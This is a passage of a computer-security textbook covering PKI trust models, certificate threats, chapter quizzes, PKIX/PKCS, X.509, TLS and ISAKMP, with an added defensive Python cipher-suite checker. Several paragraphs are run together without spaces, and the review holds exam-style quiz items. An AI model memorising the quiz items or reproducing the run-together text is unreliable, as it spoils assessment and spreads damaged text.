Debbie’s client software tracks this down and sees that the issuer for Intermediate B CA is the root CA, for which she already has a certificate and public key. So Debbie’s client software had to follow the certificate path, meaning it had to continue to track down and collect certificates until it came upon a self-signed certificate. A self-signed certificate indicates that it was signed by a root CA, and Debbie’s software has been configured to trust this entity as her trust anchor, so she can stop there. Figure 6.13 illustrates the steps Debbie’s software had to carry out just to be able to verify Sam’s certificate.
• Figure 6.13 Verifying each certificate in a certificate path
Thistypeofsimplistictrustmodelworkswellwithinanenterprisethateasilyfollowsahierarchicalorganizationalchart,butmanycompaniescannotusethistypeoftrustmodelbecausedifferentdepartmentsorofficesrequiretheirowntrustanchors.Thesedemandscanbederivedfromdirectbusinessneedsorfrominterorganizationalpolitics.Thishierarchicalmodelmightnotbepossiblewhentwoormorecompaniesneedtocommunicatewitheachother.Neithercompanywilllettheother’sCAbetherootCA,becauseeachdoesnotnecessarilytrusttheotherentitytothatdegree.Inthesesituations,theCAswillneedtoworkinapeer-to-peerrelationshipinsteadofinahierarchicalrelationship.
Peer-to-Peer Model
In a peer-to-peer trust model, one CA is not subordinate to another CA, and no established trusted anchor between the CAs is involved. The end-entities will look to their issuing CA as their trusted anchor, but the different CAs will not have a common anchor. Figure 6.14 illustrates this type of trust model. The two different CAs will certify the public key for each other, which creates a bidirectional trust. This is referred to as cross-certification, since the CAs are not receiving their certificates and public keys from a superior CA, but instead are creating them for each other.
• Figure 6.14 Cross-certification creates a peer-to-peer PKI model.
One of the main drawbacks to this model is scalability. Each CA must certify every other CA that is participating, and a bidirectional trust path must be implemented, as shown in Figure 6.15. If one root CA were certifying all the intermediate CAs, scalability would not be as much of an issue.
• Figure 6.15 Scalability is a drawback in cross-certification models.
Figure 6.15 represents a fully connected mesh architecture, meaning that each CA is directly connected to and has a bidirectional trust relationship with every other CA. As you can see in this illustration, the complexity of this setup can become overwhelming.
In any network model, fully connected mesh architectures are wasteful and expensive. In trust transfer models, the extra level of redundancy is just that: redundant and unnecessary.
Hybrid Trust Model
A company can be internally complex, and when the need arises to communicate properly with outside partners, suppliers, and customers in an authorized and secured manner, this complexity can make sticking to either the hierarchical or peer-to-peer trust model difficult, if not impossible. In many implementations, the different model types have to be combined to provide the necessary communication lines and levels of trust. In a hybrid trust model, the two companies have their own internal hierarchical models and are connected through a peer-to-peer model using cross-certification. Another option in this hybrid configuration is to implement a bridge CA.
Figure 6.16 illustrates the role that a bridge CA could play—it is responsible for issuing cross-certificates for all connected CAs and trust domains. The bridge is not considered a root or trust anchor, but merely the entity that generates and maintains the cross-certification for the connected environments.
• Figure 6.16 A bridge CA can control the cross-certification procedures.
Exam Tip: Three trust models exist: hierarchical, peer-to-peer, and hybrid. Hierarchical trust is like an upside-down tree, peer-to-peer is a lateral series of references, and hybrid is a combination of hierarchical and peer-to-peer trust.
Certificate-Based Threats
Although certificates bring much capability to security through practical management of trust, they also can present threats. Because much of the actual work is done behind the scenes, without direct user involvement, a false sense of security might ensue. End users might assume that if an HTTPS connection was made with a server, they are securely connected to the proper server. Spoofing, phishing, pharming, and a wide range of sophisticated attacks prey on this assumption. Today, industry has responded with a high-assurance certificate that is signed and recognized by browsers. Using this example, we can examine how an attacker might prey on a user’s trust in software getting things correct. If a hacker wishes to have something recognized as legitimate, he may have to obtain a certificate that proves this point to the end-user machine. One avenue would be to forge a false certificate, but this is challenging because of the public key signing of certificates by CAs. To overcome this problem, the hacker needs to install a false, self-signed root certificate on the end-user PC. This false key can then be used to validate malicious software as coming from a trusted source. This attack preys on the fact that end users do not know the contents of their root certificate store, nor do they have a means to validate changes. In an enterprise environment, this attack can be thwarted by locking down the certificate store and validating changes against a whitelist. This option really is not very practical for end users outside of an enterprise.
Stolen Certificates
Certificates act as a form of trusted ID and are typically handled without end-user intervention. To ensure the veracity of a certificate, a series of cryptographic controls is employed, including digital signatures to provide proof of authenticity. This statement aside, stolen certificates have been used in multiple cases of computer intrusions/system attacks. Specially crafted malware has been designed to steal both private keys and digital certificates from machines. One of the most infamous malware programs, the Zeus bot, has functionality to perform this task.
A stolen certificate and/or private key can be used to bypass many security measures. Concern over stolen SSL/TLS credentials led to the creation of high-assurance certificates, which are discussed in Chapter 17.
Stolen certificates have been implemented in a wide range of attacks. Malware designed to imitate antivirus software has been found dating back to 2009. The Stuxnet attack on the Iranian nuclear production facility used stolen certificates from third parties that were not involved in any way other than the unwitting contribution of a passkey in the form of a certificate. In less than a month after the Sony Pictures Entertainment attack became public in 2014, malware using Sony certificates appeared. Whether the certificates came from the break-in or one of the previous Sony hacks is unknown, but the result is the same.
Chapter 6 Review
Lab Book Exercise
The following lab exercise from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provides practical application of material covered in this chapter:
Lab 8.5w Using IPsec in Windows
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about public key infrastructures.
Implement the basics of public key infrastructures
PKI solutions include certificate authorities (CAs) and registration authorities (RAs).
PKIs form the central management functionality used to enable encryption technologies.
The steps a user performs to obtain a certificate for use are listed in the text and are important to memorize.
Describe the role of registration authorities
RAs verify identities to be used on certificates.
RAs pass identity information to CAs for use in binding to a certificate.
Use digital certificates
Certificates are handled via a certificate server and client software.
There are three classes of certificates and they have the following typical uses:
Class 1 Personal e-mail use
Class 2 Software signing
Class 3 Setting up a CA
Understand the life cycle of certificates
Certificates are generated, registered, and historically verified by the originating CA.
There are two main mechanisms to manage the revocation of a certificate: CRL and OCSP.
Keys, and hence certificates, have a life cycle; they are created, used for a defined period of time, and then destroyed.
Explain the relationship between trust and certificate verification
Trust is based on an understanding of the needs of the user and what the item being trusted offers.
Certificate verification provides assurance that the data in the certificate is valid, not whether it meets the needs of the user.
Describe the roles of certificate authorities and certificate repositories
CAs create certificates for identified entities and maintain records of their issuance and revocation.
CRLs provide a means of letting users know when certificates have been revoked before their end-of-life date.
Identify centralized and decentralized infrastructures
There are three different architectures of CAs:
Hierarchical
Peer-to-peer
Hybrid
Multiple CAs can be used together to create a web of trust.
Describe public and in-house certificate authorities
Public CAs exist as a service that allows entities to obtain certificates from a trusted third party.
In-house certificates provide certificates that allow a firm a means to use certificates within company borders.
Key Terms
authority revocation list (ARL), CA certificate, certificate, certificate authority (CA), certificate path, certificate repository, certificate revocation list (CRL), certificate server, certificate signing request (CSR), certification practices statement (CPS), cross-certification certificate, digital certificate, dual control, end-entity certificate, hardware security module (HSM), hierarchical trust model, hybrid trust model, key archiving, key escrow, key recovery, local registration authority (LRA), Online Certificate Status Protocol (OCSP), peer-to-peer trust model, policy certificate, public key infrastructure (PKI), registration authority (RA)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. The _______________ is the trusted authority for certifying individuals’ identities and creating an electronic document indicating that individuals are who they say they are.
2. A(n) _______________ is the actual request to a CA containing a public key and the requisite information needed to generate a certificate.
3. The _______________ is a method of determining whether a certificate has been revoked that does not require local machine storage of CRLs.
4. The _______________ is the actual service that issues certificates based on the data provided during the initial registration process.
5. A physical device that safeguards cryptographic keys is called a(n) _______________.
6. A(n) _______________ is a holding place for individuals’ certificates and public keys that are participating in a particular PKI environment.
7. A(n) _______________ is used when independent CAs establish peer-to-peer trust relationships.
8. A(n) _______________ is a structure that provides all of the necessary components for different types of users and entities to be able to communicate securely and in a predictable manner.
9. _______________ is the process of giving keys to a third party so that they can decrypt and read sensitive information if the need arises.
10. In a(n) _______________, one CA is not subordinate to another CA, and there is no established trust anchor between the CAs involved.
Multiple-Choice Quiz
1. When a user wants to participate in a PKI, what component does he or she need to obtain, and how does that happen?
A. The user submits a certificate request to the CA.
B. The user submits a key pair request to the CRL.
C. The user submits a certificate request to the RA.
D. The user submits proof of identification to the CA.
2. How does a user validate a digital certificate that is received from another user?
A. The user first sees whether her system has been configured to trust the CA that digitally signed the other user’s certificate and then validates that CA’s digital signature.
B. The user calculates a message digest and compares it to the one attached to the message.
C. The user first sees whether her system has been configured to trust the CA that digitally signed the certificate and then validates the public key that is embedded within the certificate.
D. The user validates the sender’s digital signature on the message.
3. What is the purpose of a digital certificate?
A. It binds a CA to a user’s identity.
B. It binds a CA’s identity to the correct RA.
C. It binds an individual identity to an RA.
D. It binds an individual identity to a public key.
4. What steps does a user’s software take to validate a CA’s digital signature on a digital certificate?
A. The user’s software creates a message digest for the digital certificate and decrypts the encrypted message digest included within the digital certificate. If the decryption performs properly and the message digest values are the same, the certificate is validated.
B. The user’s software creates a message digest for the digital signature and encrypts the message digest included within the digital certificate. If the encryption performs properly and the message digest values are the same, the certificate is validated.
C. The user’s software creates a message digest for the digital certificate and decrypts the encrypted message digest included within the digital certificate. If the user can encrypt the message digest properly with the CA’s private key and the message digest values are the same, the certificate is validated.
D. The user’s software creates a message digest for the digital signature and encrypts the message digest with its private key. If the decryption performs properly and the message digest values are the same, the certificate is validated.
5. Why would a company implement a key archiving and recovery system within the organization?
A. To make sure all data encryption keys are available for the company if and when it needs them
B. To make sure all digital signature keys are available for the company if and when it needs them
C. To create session keys for users to be able to access when they need to encrypt bulk data
D. To back up the RA’s private key for retrieval purposes
6. Within a PKI environment, where does the majority of the trust actually lie?
A. All users and devices within an environment trust the RA, which allows them to indirectly trust each other.
B. All users and devices within an environment trust the CA, which allows them to indirectly trust each other.
C. All users and devices within an environment trust the CRL, which allows them to indirectly trust each other.
D. All users and devices within an environment trust the CPS, which allows them to indirectly trust each other.
7. Which of the following properly describes what a public key infrastructure (PKI) actually is?
A. A protocol written to work with a large subset of algorithms, applications, and protocols
B. An algorithm that creates public/private key pairs
C. A framework that outlines specific technologies and algorithms that must be used
D. A framework that does not specify any technologies but provides a foundation for confidentiality, integrity, and availability services
8. Once an individual validates another individual’s certificate, what is the use of the public key that is extracted from this digital certificate?
A. The public key is now available to use to create digital signatures.
B. The user can now encrypt session keys and messages with this public key and can validate the sender’s digital signatures.
C. The public key is now available to encrypt future digital certificates that need to be validated.
D. The user can now encrypt private keys that need to be transmitted securely.
9. Why would a digital certificate be added to a certificate revocation list (CRL)?
A. If the public key had become compromised in a public repository
B. If the private key had become compromised
C. If a new employee joined the company and received a new certificate
D. If the certificate expired
10. How can users have faith that the CRL was not modified to present incorrect information?
A. The CRL is digitally signed by the CA.
B. The CRL is encrypted by the CA.
C. The CRL is open for anyone to post certificate information to.
D. The CRL is accessible only to the CA.
Essay Quiz
1. Describe the pros and cons of establishing a key archiving system program for a small- to medium-sized business.
2. Why would a small- to medium-sized firm implement a PKI solution? What business benefits would ensue from such a course of action?
3. Describe the steps involved in verifying a certificate’s validity.
4. Describe the steps in obtaining a certificate.
5. Compare and contrast the hierarchical trust model, peer-to-peer trust model, and hybrid trust model.
Lab Projects
• Lab Project 6.1 Investigate the process of obtaining a personal certificate or digital ID for e-mail usage. What information is needed, what are the costs, and what protection is afforded based on the vendor?
• Lab Project 6.2 Determine what certificates are registered with the browser instance on your computer.
Chapter 7 PKI Standards and Protocols
The nice thing about standards is that you have so many to choose from.
—ANDREW S. TANENBAUM
In this chapter, you will learn how to
Identify the standards involved in establishing an interoperable Internet PKI
Explain interoperability issues with PKI standards
Describe how the common Internet protocols implement the PKI standards
None of the still steadily growing Internet commerce would be possible without the use of standards and protocols that provide a common, interoperable environment for exchanging information securely. Due to the wide distribution of Internet users and businesses, the most practical solution to date has been the commercial implementation of public key infrastructures (PKIs). This chapter examines the standards and protocols involved in secure Internet transactions and e-business using a PKI. Although you may use only a portion of the related standards and protocols on a daily basis, you should understand how they interact to provide the services that are critical for security: confidentiality, integrity, availability, authentication, and nonrepudiation. This chapter will also include some related standards, such as FIPS and the Common Criteria.
Chapter 6 introduced the algorithms and techniques used to implement a public PKI, but, as you probably noticed, there is a lot of room for interpretation. Various organizations have developed and implemented standards and protocols that have been accepted as the basis for secure interaction in a PKI environment. These standards fall into three general categories:
Tech Tip
Revolutionary Technologies
The 1976 public disclosure of asymmetric key algorithms by Diffie, Hellman, Rivest, Shamir, and Adleman changed secure communications in a world-shattering way. It was a technology that met the need of another emerging technology; the development of the Internet during this same time led to the need for secure communications between anonymous parties—combined, a technologically revolutionary event.
Standards that define the PKI These standards define the data and data structures exchanged and the means for managing that data to provide the functions of the PKI (certificate issuance, storage, revocation, registration, and management).
Standards that define the interface between applications and the underlying PKI These standards use the PKI to establish the services required by applications (S/MIME, SSL, and TLS).
Other standards These standards don’t fit neatly in either of the other two categories. They provide bits and pieces that glue everything together; they not only can address the PKI structure and the methods and prot­ocols for using it, but can also provide an overarching business process environment for PKI implementation (for example, ISO/IEC 27002, Common Criteria, and the Federal Information Processing Standards Publications [FIPS PUBS]).
Figure 7.1 shows the relationships between these standards and protocols and conveys the interdependence of the standards and protocols discussed in this chapter. The Internet public key infrastructure (PKI) relies on three main standards for establishing interoperable PKI services: PKI X.509 (PKIX), Public Key Cryptography Standards (PKCS), and X.509. Other protocols and standards help define the management and operation of the PKI and related services—Internet Security Association and Key Management Protocol (ISAKMP) and XML Key Management Specification (XKMS) are both key management protocols, while Certificate Management Protocol (CMP) is used for managing certificates. Certificate Enrollment Protocol (CEP) is an alternative certificate issuance, distribution, and revocation mechanism. Finally, Pretty Good Privacy (PGP) provides an alternative method spanning the protocol and application levels.
• Figure 7.1 Relationships between PKI standards and protocols
This chapter examines each standard from the bottom up, starting with building an infrastructure through protocols and applications, and finishing with some of the inherent weaknesses of and potential attacks on a PKI.
PKIX and PKCS
Two main standards have evolved over time to implement PKIs on a practical level on the Internet. Both are based on the X.509 certificate standard (discussed shortly in the “X.509” section) and establish complementary standards for implementing PKIs. PKIX and PKCS intertwine to define the most commonly used set of standards. PKIX was produced by the Internet Engineering Task Force (IETF) and defines standards for interactions and operations for four component types: the user (end-entity), certificate authority (CA), registration authority (RA), and the repository for certificates and certificate revocation lists (CRLs). PKCS defines many of the lower-level standards for message syntax, cryptographic algorithms, and the like. The PKCS set of standards is a product of RSA Security.
The PKIX working group was formed in 1995 to develop the standards necessary to support PKIs. At the time, the X.509 Public Key Certificate (PKC) format was proposed as the basis for a PKI. X.509 includes information regarding data formats and procedures used for CA-signed PKCs, but it doesn’t specify values or formats for many of the fields within the PKC. PKIX provides standards for extending and using X.509 v3 certificates and for managing them, enabling interoperability between PKIs following the standards.
PKIX uses the model shown in Figure 7.2 for representing the components and users of a PKI. The user, called an end-entity, is not part of the PKI, but end-entities are either users of the PKI certificates, the subject of a certificate (an entity identified by it), or both. The certificate authority (CA) is responsible for issuing, storing, and revoking certificates—both PKCs and Attribute Certificates (ACs). The RA is responsible for management activities designated by the CA. The RA can, in fact, be a component of the CA rather than a separate component. The final component of the PKIX model is the repository, a system or group of distributed systems that provides certificates and CRLs to the end-entities. The certificate revocation list (CRL) is a digitally signed object that lists all of the current but revoked certificates issued by a CA.
• Figure 7.2 The PKIX model
Tech Tip
PKI Essentials
A PKI brings together policies, procedures, hardware, software, and end users to create, manage, store, distribute, and revoke digital certificates.
PKIX Standards
Now that we have looked at how PKIX is organized, let’s take a look at what PKIX does. Using X.509 v3, the PKIX working group addresses five major areas:
PKIX outlines certificate extensions and content not covered by X.509 v3 and the format of version 2 CRLs, thus providing compatibility standards for sharing certificates and CRLs between CAs and end-entities in different PKIs. The PKIX profile of the X.509 v3 PKC describes the contents, required extensions, optional extensions, and extensions that need not be implemented. The PKIX profile suggests a range of values for many extensions. In addition, PKIX provides a profile for version 2 CRLs, allowing different PKIs to share revocation information.
PKIX provides certificate management message formats and protocols, defining the data structures, management messages, and management functions for PKIs. The working group also addresses the assumptions and restrictions of their protocols. This standard identifies the protocols necessary to support online interactions between entities in the PKIX model. The management protocols support functions for entity registration, initialization of the certificate (possibly key-pair generation), issuance of the certificate, key-pair update, certificate revocation, cross-certification (between CAs), and key-pair recovery if available.
PKIX outlines certificate policies and certification practices statements (CPSs), establishing the relationship between policies and CPSs. A policy is a set of rules that helps determine the applicability of a certificate to an end-entity. For example, a certificate for handling routine information would probably have a policy on creation, storage, and management of key pairs quite different from a policy for certificates used in financial transactions, due to the sensitivity of the financial information. A CPS explains the practices used by a CA to issue certificates. In other words, the CPS is the method used to get the certificate, while the policy defines some characteristics of the certificate and how it will be handled and used.
PKIX specifies operational protocols, defining the protocols for certificate handling. In particular, protocol definitions are specified for using File Transfer Protocol (FTP) and Hypertext Transfer Protocol (HTTP) to retrieve certificates from repositories. These are the most common protocols for applications to use when retrieving certificates.
PKIX includes time-stamping and data certification and validation services, which are areas of interest to the PKIX working group, and which will probably grow in use over time. A timestamp authority (TSA) certifies that a particular entity existed at a particular time. A Data Validation and Certification Server (DVCS) certifies the validity of signed documents, PKCs, and the possession or existence of data. These capabilities support nonrepudiation requirements and are considered building blocks for a nonrepudiation service.
PKCs are the most commonly used certificates, but the PKIX working group has been working on two other types of certificates: Attribute Certificates and Qualified Certificates. An Attribute Certificate (AC) is used to grant permissions using rule-based, role-based, and rank-based access controls. ACs are used to implement a privilege management infrastructure (PMI). In a PMI, an entity (user, program, system, and so on) is typically identified as a client to a server using a PKC. There are then two possibilities: either the identified client pushes an AC to the server, or the server can query a trusted repository to retrieve the attributes of the client. This situation is modeled in Figure 7.3.
• Figure 7.3 The PKIX PMI model
The client push of the AC has the effect of improving performance, but no independent verification of the client’s permissions is initiated by the server. The alternative is to have the server pull the information from an AC issuer or a repository. This method is preferable from a security standpoint, because the server or server’s domain determines the client’s access rights. The pull method has the added benefit of requiring no changes to the client software.
The Qualified Certificate (QC) is based on the term used within the European Commission to identify certificates with specific legislative uses. This concept is generalized in the PKIX QC profile to indicate a certificate used to identify a specific individual (a single human rather than the entity of the PKC) with a high level of assurance in a nonrepudiation service.
There are dozens of IETF Requests for Comment (RFCs) that have been produced by the PKIX working group for each of these five areas.
For a complete list of current and pending documents associated with PKIX, see the Internet draft for the PKIX working group roadmap (https://www.ietf.org/archive/id/draft-ietf-pkix-roadmap-09.txt/).
PKCS
RSA Laboratories created the Public Key Cryptography Standards (PKCS) to fill some of the gaps in the standards that existed in PKI implementation. As they have with the PKIX standards, PKI developers have adopted many of these standards as a basis for achieving interoperability between different CAs. PKCS is composed of a set of (currently) 13 active standards, with 2 other standards that are no longer active. The standards are referred to as PKCS #1 through PKCS #15, as listed in Table 7.1. The standards combine to establish a common base for services required in a PKI.
Table 7.1 PKCS Standards
Though adopted early in the development of PKIs, some of these standards are being phased out. For example, PKCS #6 is being replaced by X.509 v3 (covered shortly in the “X.509” section) and PKCS #7 and PKCS #10 are being used less, as their PKIX counterparts are being adopted.
Why You Need to Know the PKIX and PKCS Standards
If your company is planning to use one of the existing certificate servers to support e-commerce, you may not need to know the specifics of these standards (except perhaps for the CompTIA Security+ exam). However, if you plan to implement a private PKI to support secure services within your organization, you need to understand what standards are out there and how the decision to use a particular PKI implementation (either homegrown or commercial) may lead to incompatibilities with other certificate-issuing entities. You must consider your business-to-business requirements when you’re deciding how to implement a PKI within your organization.
Exam Tip: All of the standards and protocols discussed in this chapter are the “vocabulary” of the computer security industry. You should be well versed in all these titles and their purposes and operations.
Tech Tip
X.509 Essentials
X.509 specifies standard formats for public key certificates, certificate revocation lists, and Attribute Certificates.
X.509
What is a certificate? As explained in Chapter 6, a certificate is merely a data structure that binds a public key to subjects (unique names, DNS entries, or e-mails) and is used to authenticate that a public key indeed belongs to the subject. In the late 1980s, the X.500 OSI Directory Standard was defined by the International Organization for Standardization (ISO) and the International Telecommunication Union (ITU). It was developed for implementing a network directory system, and part of this directory standard was the concept of authentication of entities within the directory. X.509 is the portion of the X.500 standard that addresses the structure of certificates used for authentication.
Several versions of the X.509 certificates have been created, with version 3 being the current version (as this is being written). Each version has extended the contents of the certificates to include additional information necessary to use certificates in a PKI. The original ITU X.509 definition was published in 1988, was formerly referred to as CCITT X.509, and is sometimes referred to as ISO/IEC/ITU 9594-8. Version 3 added additional optional extensions for more subject identification information, key attribute information, policy information, and certification path constraints. In addition, version 3 allows additional extensions to be defined in standards or to be defined and registered by organizations or communities.
Certificates are used to encapsulate the information needed to authenticate an entity. The X.509 specification defines a hierarchical certification structure that relies on a root CA that is self-certifying (meaning it issues its own certificate). All other certificates can be traced back to such a root through a path. A CA issues a certificate to a uniquely identifiable entity (person, corporation, computer, and so on)—issuing a certificate to “John Smith” would cause some real problems if that were all the information the CA had when issuing the certificate. We are saved somewhat by the requirement that the CA determines what identifier is unique (the distinguished name), but when certificates and trust are extended between CAs, the unique identification becomes critical.
Cross Check
Certificates
A detailed description of certificates and the supporting public key infrastructure is provided in Chapter 6.
SSL/TLS
Secure Sockets Layer (SSL) and Transport Layer Security (TLS) provide the most common means of interacting with a PKI and certificates. The older SSL protocol was introduced by Netscape as a means of providing secure connections for web transfers using encryption. These two protocols provide secure connections between the client and server for exchanging information. They also provide server authentication (and optionally, client authentication) and confidentiality of information transfers. See Chapter 17 for a detailed explanation.
Tech Tip
SSL/TLS Simplified
SSL and TLS are cryptographic protocols to provide data integrity and security over networks by encrypting network connections at the transport layer. In many cases people use the term SSL even when TLS is in fact the protocol being used.
The IETF established the TLS working group in 1996 to develop a standard transport layer security protocol. The working group began with SSL version 3.0 as its basis and released RFC 2246, “The TLS Protocol Version 1.0,” in 1999 as a proposed standard. The working group also published RFC 2712, “Addition of Kerberos Cipher Suites to Transport Layer Security (TLS),” as a proposed standard, and two RFCs on the use of TLS with HTTP. Like its predecessor, TLS is a protocol that ensures privacy between communicating applications and their users on the Internet. When a server and client communicate, TLS ensures that no third party can eavesdrop or tamper with any message.
SSL is deprecated. All versions of SSL, including v3, have exploitable vulnerabilities that make the protocol no longer considered secure. For all traffic where confidentiality is important, you should use TLS.
TLSiscomposedoftwoparts:theTLSRecordProtocolandtheTLSHandshakeProtocol.TheTLSRecordProtocolprovidesconnectionsecuritybyusingsupportedencryptionmethods.TheTLSRecordProtocolcanalsobeusedwithoutencryption.TheTLSHandshakeProtocolallowstheserverandclienttoauthenticateeachotherandtonegotiateasessionencryptionalgorithmandcryptographickeysbeforedataisexchanged.ThoughTLSisbasedonSSLandissometimesreferredtoasSSL,they
arenotinteroperable.However,theTLSprotocoldoescontainamechanismthatallowsaTLSimplementationtobackdowntoSSL3.0.Thedifferencebetweenthetwoisthewaytheyperformkeyexpansionandmessageauthenticationcomputations.TheTLSRecordProtocolisalayeredprotocol.Ateachlayer,messagesmayincludefieldsforlength,description,andcontent.TheRecordProtocoltakesmessagestobetransmitted,fragmentsthedataintomanageableblocks,optionallycompressesthedata,appliesamessageauthenticationcode(HMAC)tothedata,encryptsit,andtransmitstheresult.Receiveddataisdecrypted,verified,decompressed,andreassembled,andthendeliveredtohigher-levelclients.TheTLSHandshakeProtocolinvolvesthefollowingsteps,whichare
summarizedinFigure7.4:
•Figure7.4TLSHandshakeProtocol
1.Exchangehellomessagestoagreeonalgorithms,exchangerandomvalues,andcheckforsessionresumption.
2.Exchangethenecessarycryptographicparameterstoallowtheclientandservertoagreeonapre-mastersecret.
3.Exchangecertificatesandcryptographicinformationtoallowtheclientandservertoauthenticatethemselves.
4.Generateamastersecretfromthepre-mastersecretandexchangerandomvalues.
5.Providesecurityparameterstotherecordlayer.6.Allowtheclientandservertoverifythattheirpeerhascalculated
thesamesecurityparametersandthatthehandshakeoccurredwithouttamperingbyanattacker.
Thoughithasbeendesignedtominimizethisrisk,TLSstillhaspotentialvulnerabilitiestoaman-in-the-middleattack.Ahighlyskilledandwell-placedattackercanforceTLStooperateatlowersecuritylevels.Regardless,throughtheuseofvalidatedandtrustedcertificates,asecureciphersuitecanbeselectedfortheexchangeofdata.Onceestablished,aTLSsessionremainsactiveaslongasdataisbeing
exchanged.Ifsufficientinactivetimehaselapsedforthesecureconnectiontotimeout,itcanbereinitiated.
TechTip
DisablingSSLBecauseallversionsofSSL,includingv3,haveexploitablevulnerabilitiesthatmaketheprotocolnolongerconsideredsecure,usersshouldnotrelyonitforsecurity.ChromenolongerusesSSL.ForInternetExplorer,youneedtounchecktheSSLboxesunderInternetOptions.
Cipher Suites
In many applications, the use of cryptography occurs as a collection of functions. Different algorithms can be used for authentication, encryption/decryption, digital signatures, and hashing. The term cipher suite refers to an arranged group of algorithms. For instance, TLS has a published TLS Cipher Suite Registry at www.iana.org/assignments/tls-parameters/tls-parameters.xhtml. There is a wide range of ciphers, some old and some new, each with its own strengths and weaknesses. Over time, new methods and computational abilities change the viability of ciphers. The concept of strong versus weak ciphers is an acknowledgment that, over time, ciphers can become vulnerable to attacks. The application or selection of ciphers should take into consideration that not all ciphers are still strong. When selecting a cipher for use, it is important to make an appropriate choice. For example, if a server offers SSLv3 and TLS, you should choose TLS only, as SSLv3 has been shown to be vulnerable.
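The registry names make the "arranged group of algorithms" explicit: an IANA name such as TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 spells out the key exchange, the bulk cipher, and the MAC or PRF hash. The code below is an added example (not from the book) that parses those names and flags components a practitioner would reject today, and then builds a Python `ssl` client context whose protocol floor is TLS 1.2, so SSL 3.0 can never be negotiated. The weak-component lists are this example's own judgement, not a registry attribute.

```python
import ssl

# Components still present in the IANA registry that should be treated as weak.
WEAK_CIPHERS = {"NULL", "RC4", "RC2", "DES", "3DES", "IDEA", "EXPORT"}
WEAK_MACS = {"NULL", "MD5"}
FORWARD_SECRET_KX = {"ECDHE", "DHE"}
AEAD_MODES = {"GCM", "CCM", "CHACHA20"}


def parse_suite(name):
    """Split an IANA cipher-suite name into (key exchange, cipher, MAC/hash).

    TLS 1.2 and earlier: TLS_<kx>_WITH_<cipher>_<mac>.
    TLS 1.3 names (TLS_AES_128_GCM_SHA256) carry no key-exchange part, so kx is None.
    """
    if not name.startswith("TLS_"):
        raise ValueError("not a TLS cipher-suite name: %r" % name)
    body = name[4:]
    if "_WITH_" in body:
        kx, rest = body.split("_WITH_", 1)
    else:
        kx, rest = None, body
    cipher, _, mac = rest.rpartition("_")
    return kx, cipher, mac


def assess_suite(name):
    """Return the weaknesses found in a suite; an empty list means acceptable."""
    kx, cipher, mac = parse_suite(name)
    findings = []
    cipher_tokens = set(cipher.split("_"))
    if kx is not None:  # TLS 1.3 suites are always ephemeral (EC)DHE with AEAD
        kx_tokens = set(kx.split("_"))
        if not kx_tokens & FORWARD_SECRET_KX:
            findings.append("no forward secrecy (static key exchange: %s)" % kx)
        if "anon" in kx_tokens:
            findings.append("unauthenticated key exchange")
        if "EXPORT" in kx_tokens:
            findings.append("export-grade key exchange")
        if not cipher_tokens & AEAD_MODES:
            findings.append("non-AEAD construction")
    weak = cipher_tokens & WEAK_CIPHERS
    if weak:
        findings.append("weak cipher: " + ", ".join(sorted(weak)))
    if mac in WEAK_MACS:
        findings.append("weak MAC: " + mac)
    return findings


def hardened_client_context():
    """A client context that cannot fall back to SSL 3.0 (or TLS 1.0/1.1) and
    that verifies the server certificate and host name."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)   # CERT_REQUIRED + hostname check
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2    # the protocol floor
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5")  # TLS 1.2 suites only
    return ctx


def context_floor(ctx):
    """Name of the lowest protocol version the context will negotiate."""
    return ctx.minimum_version.name


def context_verifies_peer(ctx):
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


if __name__ == "__main__":
    for suite in ("TLS_RSA_WITH_RC4_128_MD5",
                  "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
                  "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
                  "TLS_AES_256_GCM_SHA384"):
        print(suite, "->", assess_suite(suite) or ["ok"])
    ctx = hardened_client_context()
    print("floor:", context_floor(ctx), "verifies peer:", context_verifies_peer(ctx))
```

The classifier generalizes the book's single SSLv3-versus-TLS example to the other choices that a server's offered list forces on you: static RSA key exchange, RC4 or (3)DES, MD5 MACs, export-grade suites and anonymous exchanges all show up as findings, while TLS 1.3 suites pass because the protocol itself fixes the key exchange and requires AEAD.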
ISAKMP
The Internet Security Association and Key Management Protocol (ISAKMP) provides a method for implementing a key exchange protocol and for negotiating a security policy. It defines procedures and packet formats to negotiate, establish, modify, and delete security associations. Because it is a framework, it doesn't define implementation-specific protocols, such as the key exchange protocol or hash functions. Examples of ISAKMP are the Internet Key Exchange (IKE) protocol and IPsec, which are used widely throughout the industry.
An important definition for understanding ISAKMP is that of the term security association. A security association (SA) is a relationship in which two or more entities define how they will communicate securely. ISAKMP is intended to support SAs at all layers of the network stack. For this reason, ISAKMP can be implemented on the transport layer using TCP or User Datagram Protocol (UDP), or it can be implemented on IP directly.
Negotiation of an SA between servers occurs in two stages. First, the entities agree on how to secure negotiation messages (the ISAKMP SA). Once the entities have secured their negotiation traffic, they then determine the SAs for the protocols used for the remainder of their communications. Figure 7.5 shows the structure of the ISAKMP header. This header is used during both parts of the ISAKMP negotiation.
• Figure 7.5 ISAKMP header format
The Initiator Cookie is set by the entity requesting the SA, and the responder sets the Responder Cookie. The Payload byte indicates the type of the first payload to be encapsulated. Payload types include security associations, proposals, key transforms, key exchanges, vendor identities, and other things. The Major and Minor Revision fields refer to the major version number and minor version number for the ISAKMP. The Exchange Type helps determine the order of messages and payloads. The Flags bits indicate options for the ISAKMP exchange, including whether the payload is encrypted, whether the initiator and responder have "committed" to the SA, and whether the packet is to be authenticated only (and is not encrypted). The final fields of the ISAKMP header indicate the Message Identifier and a Message Length. Payloads encapsulated within ISAKMP use a generic header, and each payload has its own header format.
Once the ISAKMP SA is established, multiple protocol SAs can be established using the single ISAKMP SA. This feature is valuable due to the overhead associated with the two-stage negotiation. SAs are valid for specific periods of time, and once the time expires, the SA must be renegotiated. Many resources are also available for specific implementations of ISAKMP within the IPsec protocol.
